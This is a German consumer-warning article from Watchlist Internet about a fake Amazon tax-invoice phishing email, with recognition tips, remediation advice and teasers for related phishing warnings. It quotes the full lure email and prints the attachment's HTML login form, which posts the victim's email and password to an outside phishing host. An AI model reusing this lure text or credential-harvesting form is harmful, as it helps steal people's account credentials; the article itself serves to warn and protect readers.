Zum Seiteninhalt

News

Amazon-Phishingmail: Rechnung über Ihre Verkäufergebühren

Gepostet am 27.03.2017 um 15:20 Uhr von Watchlist Internet

In einer angeblichen Nachricht von „Europe Amazon“ erhalten Kund/innen die Information, dass ihr „Duplikat der elektronisch erzeugten Steuerrechnung“ verfügbar sei. Sie können es in einem beigefügten Dokument, das den Login-Bereich von Amazon imitiert, herunterladen. Es handelt sich um einen Phishingversuch.

Mit einer gefälschten Amazon-Nachricht versuchen Kriminelle, die Zugangsdaten von Kund/innen zu stehlen. Damit sie das Ziel erreichen, behaupten sie, dass die „elektronisch erzeugten (sic!) Steuerrechnung“ als „Email-Dokument (sic!)“ verfügbar sei. Die Steuerrechnung könne angeblich nur durch Bekanntgabe der Zugangsdaten in einem beigefügten html-Dokument eingesehen werden. Wortwörtlich heißt es in der E-Mail dazu:

Absender: Europe Amazon <messages-marketplace@amazon-europe.com>
Betreff: Rechnung uber Ihre Verkaeufergebuehren bei Amazon.de 03/2017 .

Guten Tag,

Wir werden Ihnen ein Duplikat der elektronisch erzeugten Steuerrechnung für den Monat 02/2017 als ein Email-Dokument senden. Bemerken Sie(nehmen Sie zur Kenntnis) bitte, dass das nicht ein Zahlungsantrag(Zahlungswunsch) ist.

Loggen Sie bitte in zu Ihrem Verkaufskonto in Verkäufer Zentral, Sie werden die Form(Formular) für Ihr Konto per Email geschickt oder um Kopien anderer Steuererklärungen zu bitten, bezahlt zu werden.

Wenn Sie weitere Fragen haben, setzen Sie sich bitte mit unserem Verkaufsdienst in Verbindung.

Blicke(Hinsicht)

Freundliche Grusse
Amazon Europe

Dateianhang: Rechnung-mustermailadresse #25.03.2017.html

Bereits grafisch erweckt die gefälschte Amazon-Phishingmail den Eindruck, unseriös zu sein:


Eine gefälschte Amazon-Phishingmail.

Datenübermittlung an Kriminelle

Empfänger/innen, die den Dateianhang der E-Mail öffnen, um ihre angebliche Steuerrechnung zu sehen, sehen ein html-Dokument, das den Loginbereich von Amazon imitiert Ihre E-Mailadresse ist bereits in einem von zwei Formularfeld eingetragen. Kund/innen müssen nur noch ihr Passwort eingeben und die Schaltfläche „Anmelden“ betätigen.


Eine gefälschte Amazon-Phishingmail.

Das Betätigen der Schaltfläche „Anmelden“ führt den Befehl

<form action="verify.amazon-check.us/verify.php" method="post"><br>
<input id="user" name="user" type="text" value="muster@adresse.at"  required/>
<input id="pass" name="pass" type="password" value=""  required/><br />
<input id="submit" name="submit" type="submit" value="" />

aus. Der Befehl führt dazu, dass Kund/innen die im Formular abgefragten Informationen an Kriminelle senden. Dadurch haben diese Zugang auf das fremde Amazon-Konto und können es für Verbrechen nutzen.

Woran erkennen Sie die Phishingmail?

Die vermeintliche Amazon-Nachricht können Sie unter anderem anhand der nachfolgenden Punkte als betrügerisch erkennen:

  • Amazon versendet kein „Duplikat der elektronisch erzeugten Steuerrechnung“. Damit ist die Nachricht inhaltlich falsch.
  • Als Absender der E-Mail scheint „Europe Amazon“ auf, die dazugehörige E-Mailadresse „messages-marketplace@amazon-europe.com“ gehört jedoch nicht dem Unternehmen: Ein Anonymisierungsdienst aus den USA hat die Domain „amazon-europe.com“ registriert.
  • Die E-Mail weist zahlreiche Fehler auf („Bemerken Sie (nehmen Sie zur Kenntnis) bitte“). Echte Amazon-Nachrichten sind lektoriert und fehlerfrei.
  • Das Schreiben spricht Empfänger/innen nicht persönlich an: „Guten Tag“. Unternehmen kennen ihre Kund/innen und benennen diese mit ihrem Namen.
  • Kund/innen sollen in einem manipulierten Dateianhang ihre Amazon-Zugangsdaten bekannt geben und diese an Unbekannte senden. Das ist ein eindeutiger Hinweis darauf, dass es sich um einen Phishingversuch handelt.

Sie haben das Formular ausgefüllt?

Wenn Sie das Formular der Kriminellen ausgefühlt haben, rufen Sie umgehend die offizielle Amazon-Website auf und ändern darauf das Passwort Ihres Benutzerkontos. Ist das nicht mehr möglich, weil sich die Verbrecher/innen bereits Zugriff zu Ihrem Konto verschafft haben, kontaktieren Sie den Amazon-Kundendienst und besprechen mit ihm das weitere Vorgehen zur Schadensabwehr. Rufen Sie Ihr Kreditkarteninstitut an und lassen Sie  Ihre Kreditkarte sperren. Finden Sie auf Ihren Kontoauszügen nicht von Ihnen autorisierte Abbuchungen, beeinspruchen Sie diese bei Ihrer Bank.

Die Watchlist Internet empfiehlt:

Verschieben Sie vermeintliche Amazon-Nachrichten, die Sie auffordern, persönliche Zugangsdaten in einem Dateianhang bekannt zu geben, in Ihren Spam-Ordner. Bei den E-Mails handelt es sich um einen Phishingversuch. Er zielt darauf ab, das Fremde Zugriff auf Ihr Kundenkonto erlangen!

(Die Watchlist Internet bedankt sich bei Leser/innen für die Meldung der Amazomn-Phishingnachricht.)

Alles zum Thema „Phishing

Gefälschte Netflix-Nachricht: Problem with your Membership

In einer gefälschten Netflix-Nachricht behaupten Kriminelle, dass es Probleme mit den Kreditkartendaten von Kund/innen gäbe. Aus diesem Grund sollen sie auf einer Website ihre Zahlungsmethode erneuern. Kund/inenn, die der Aufforderung nachkommen, übermitteln ihre Bankdaten an Kriminelle und werden Opfer eines Datendiebstahls.

weiterlesen

Gepostet am 14.06.2017 um 10:52 Uhr von Watchlist Internet

Gefälschtes easybank-Schreiben: Konto gesperrt

Kriminelle versenden eine gefälschte easybank-Nachricht. Darin heißt es, dass Unbekannte auf das Konto zugegriffen haben. Deshalb sollen Kund/innen eine Website aufrufen, persönliche Bankdaten bekannt geben und ihr Konto bestätigen. Wer die verlangten Informationen Preis gibt, übermittelt sie an Verbrecher/innen.

weiterlesen

Gepostet am 17.05.2017 um 15:03 Uhr von Watchlist Internet

Phishingversuch bei willhaben-Kunden

Nutzer/innen von willhaben erhalten eine WhatsApp-Nachricht, die angeblich von der Kleinanzeigenplattform stammt. Darin heißt es, dass das Unternehmen ihre Anzeige deaktiviert habe. Damit Kund/innen das Problem lösen können, sollen sie sich auf einer gefälschten willhaben-Website anmelden. Dadurch gelangen die bekannt gegebenen Zugangsdaten an Kriminelle.

weiterlesen

Gepostet am 08.05.2017 um 15:40 Uhr von Watchlist Internet

Gefälschte Apple-Mail: Deine Apple-ID wurde aktualisiert

In einer gefälschten Apple-Nachricht behaupten Kriminelle, dass das Passwort von Kund/innen geändert worden sei. Aus diesem Grund sollen sie auf einer Website persönliche Informationen bekannt geben und damit die ungewollte Änderung rückgängig machen. In Wahrheit führt die Bekanntgabe der Daten dazu, dass Verbrecher/innen über diese verfügen.

weiterlesen

Gepostet am 24.04.2017 um 15:41 Uhr von Watchlist Internet

Phishingversuch bei der FH Oberösterreich

In einer gefälschten FH OÖE IT-SERVICE DESK-Nachricht heißt es, dass Empfänger/innen ihr Webmail-Konto bestätigen müssen. Dazu sollen sie eine Website aufrufen und ihre Zugangsdaten bekannt geben. Es handelt sich um einen Phishingversuch. Wer der Aufforderung nachkommt, übermittelt Kriminellen die Zugangsdaten des FH OÖ-Webmailkontos.

weiterlesen

Gepostet am 22.03.2017 um 12:35 Uhr von Watchlist Internet

Gefälschte Oberbank-Nachricht: Konto gesperrt!

Kund/innen erhalten scheinbar eine E-Mail der Oberbank. Darin heißt es, dass es zu einem nicht autorisierten Zugriff auf ihr Konto gekommen sei. Aus diesem Grund sollen Empfänger/innen ihre Zugangsdaten auf einer gefälschten Oberbank-Website bekannt geben. Es handelt sich um einen Phishingversuch!

weiterlesen

Gepostet am 27.02.2017 um 13:14 Uhr von Watchlist Internet

Kriminelle versenden gefälschte BAWAK P.S.K.-SMS

In einer gefälschten BAWAG P.S.K.-SMS heißt es, dass die Bank das Konto von Kund/innen gesperrt habe. Damit diese ihr Konto wieder aktivieren können, sollen sie eine Website aufurfen und ihre Zugangsdaten bekannt geben. Achtung: Es handelt sich um einen Phishingversuch. Am besten ist es, wenn Sie die SMS löschen.

weiterlesen

Gepostet am 24.02.2017 um 15:33 Uhr von Watchlist Internet

Unterstützt von:

Ein Projekt des:

Internet Ombudsmann